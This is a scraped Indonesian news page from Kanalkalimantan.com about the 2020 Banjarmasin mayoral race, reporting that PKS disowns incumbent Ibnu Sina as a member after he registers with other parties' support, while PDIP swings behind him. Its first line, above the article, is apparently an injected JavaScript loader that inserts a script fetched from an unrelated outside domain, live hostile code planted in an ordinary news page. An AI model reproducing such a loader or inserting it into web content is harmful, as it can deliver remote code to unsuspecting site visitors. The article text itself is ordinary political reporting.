(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Respons Pendaftaran Incumbent, PKS Langsung ‘Talak’ Ibnu Sina sebagai Kader!


KANALKALIMANTAN.COM, BANJARMASIN – Pasca pendaftaran kandidat di KPU Banjarmasin, tensi pertarungan politik antarkandidat langsung panas. Merespons langkah incumbent Ibnu Sina yang menyodorkan berkas pencalonan, PKS langsung memberi sikap keras. Partai berbasis dakwah itu langsng memberikan ‘surat talak’ kepada Ibnu dengan menyatakan bukan lagi sebagai kader.

Hal ini ditegaskan Ketua DPC PKS Banjarmasin Hendra dengan merujuk instruksi DPP PKS yang telah merekomendasikan pasangan Ananda-Mushaffa Zakir sebagai jagoannya di Pilkada Banjarmasin.

Ia mengatakan, saat Ibnu Sina mendaftarkan diri dengan dukungan parpol lain, itu artinya yang bersangkutan bukan kader PKS lagi. “Ketika sudah datang perintah atau instruksi dari pusat, sejak itu pula kami solid mendukung Hj Ananda – Mushaffa Zakir. Bagi yang melanggar intruksi, tentu akan ada sanksi tegas DPP,” tegasnya.

Hendra yang juga Ketua Tim Pemenangan Ananda – Mushaffa mengatakan PKS telah merapatkan barisan. Seluruh kader kompak untuk mendukung Ananda – Mushaffa. “Semua mesin politik, semua kader PKS sudah kami kumpulkan. Hanya ada satu arahan yakni menangkan Ananda – Mushaffa Zakir,” katanya.

Sengkarut politik, melibatkan tiga kandidat yakni incumbent Ibnu Sina, Ananda, dan Haris Makkie, yang memastikan berlaga pada kontestasi 9 Desember 2020 nanti. Berlangsung cepat, aksi saling telikung terjadi di antara para parpol pendukung kandidat.

Duet Ananda-Mushaffa berhasil menggembosi kendaraan politik incumbent. Suara PKS benar-benar tak jatuh ke Ibnu Sina. PKS memilih mendukung kubu penantang Ananda-Mushaffa Zakir, dan bergabung dalam koalisi besar bersama PAN dan Partai Golkar yang kemungkinan besar juga akan segera mengeluarkan rekomendasinya.

Rekomendasi PKS kepada pasangan Ananda-Mushaffa, ditetapkan berdasarkan surat keputusan No 220/SKEP/DPP-PKS/2020 tentang penetapan calon wali kota dan wakil wali kota Banjarmasin. Dalam surat tersebut, ditegaskan bahwa PKS mendukung Ananda sebagai calon Wali Kota dan Mushaffa Zakir yang merupakan kadernya, sebagai calon Wakil Wali Kota. Surat tersebut ditandatangani, oleh Presiden PKS Sohibul Iman dan Sekjen Mustafa Kamal. Surat tersebut sudah diteken sejak 13 Agustus lalu.

Di sisi lain, Ibnu Sina juga tak tinggal diam. Meski sokongan PKS berhasil dicuri kubu Ananda-Mushaffa, tapi ia berhasil memboyong dukungan PDIP, yang sebelumnya diprediksi lebih cenderung ke Ananda.

Ya, akhirnya PDIP memutuskan untuk merapat ke kubu petahana Ibnu Sina – Ariffin Noor di Pilkada Banjarmasin. Ini terlihat dengan adanya beberapa elit PDIP Kota Banjarmasin yang turut serta mengantar Ibnu pada pendaftaran di KPU Kota Banjarmasin, Jumat (4/9/2020) pagi.
Diakui Ketua DPC PDIP Kota Banjarmasin H. Muhaimin, keputusan ini diambil sata injury time. Kendati ia mengklaim, partai telah melakukan perhitungan sebelum menjatuhkan pilihan ke Ibnu-Ariffin.

“Kita penuh dengan perhitungan dan kita juga perlu melaksanakan survey yang dilakukan secara internal dan kita bersama DPD dan DPP selalu melakukan komunikasi terkait Pilkada Banjarmasin,” kata Muhaimin.

Selain mengambil keputusan saat injury time, keputusan ini diambil karena baru saja mendapatkan keputusan dari DPP PDIP pada Kamis malam tadi. Sehingga, baru pagi ini dukungan partai besutan Megawati Soekarnoputri ini menyatakan mengusung Ibnu-Ariffin. (Kanalkalimantan.com/fikri)

 

 

Reporter: Fikri
Editor: Cell


Desy Arfianty

Recent Posts

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

2 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

3 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

4 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

6 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

6 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

8 jam ago

This website uses cookies.